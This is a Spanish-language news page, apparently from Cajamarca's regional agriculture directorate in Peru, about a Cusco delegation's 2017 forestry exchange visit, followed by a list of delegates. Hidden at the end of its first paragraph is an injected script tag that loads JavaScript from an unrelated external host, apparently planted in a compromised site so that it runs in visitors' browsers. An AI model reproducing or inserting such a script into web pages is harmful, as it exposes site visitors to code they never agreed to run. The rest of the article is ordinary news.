Ingresar

CAJAMARCA RECIBE A DELEGACION CUSQUEÑA PARA INTERCAMBIO DE EXPERIENCIAS EN TEMA FORESTAL

Miércoles, 29 Noviembre, 2017 - 16:52
Una delegación de 23 representantes de la Región Cusco, entre funcionarios del Gobierno Regional y productores, arribaron a Cajamarca para un intercambio de experiencias con la Dirección Regional de Agricultura (DRAC), en el tema forestal: fabricación de tableros y mueblería en general; además de manejo de viveros y producción de pino.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Los visitantes fueron recibidos por funcionarios de la Dirección Regional de Agricultura Cajamarca, y a partir de este viernes (01 de diciembre) iniciarán el programa de actividades con charlas de capacitación en el vivero de Tartar, a cargo del equipo técnico de la Dirección de Recursos Forestales y Fauna Silvestre de la  Dirección Regional de Agricultura.

El intercambio de conocimientos se realiza en el marco de la política ambiental nacional, uno de los principales instrumentos de gestión para el desarrollo sostenible del país, elaborado de acuerdo a la Declaración de Río, sobre Medio Ambiente y Desarrollo.

Se trata de objetivos formulados por la Organización de las Naciones Unidas y los demás tratados y declaraciones internacionales suscritos por el Estado Peruano en materia ambiental.

La delegación cusqueña está conformada por: Ing. Víctor Verduzco Torres, coordinador del proyecto forestal Cusco; Ing. Elvis Galicia Ramírez, residente del proyecto forestal Cusco; Ing. Raúl Carpio Ortiz de Ceballos, especialista del tema forestal; Ing. Juan Guzmán Figueroa, jefe del proyecto forestación Alto Llavero.

También, Ing. Edwin Mansilla, Sub gerente del Gobierno Regional Cusco; Ing. Juan la Torre Valdeiglesias, supervisor regional Cusco; Biólogo David Quispe Orosco, alcalde de la Municipalidad Distrital de Ccorca; y productores de la región Cusco.

AdjuntoTamaño
PDF icon descargue 130.09 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen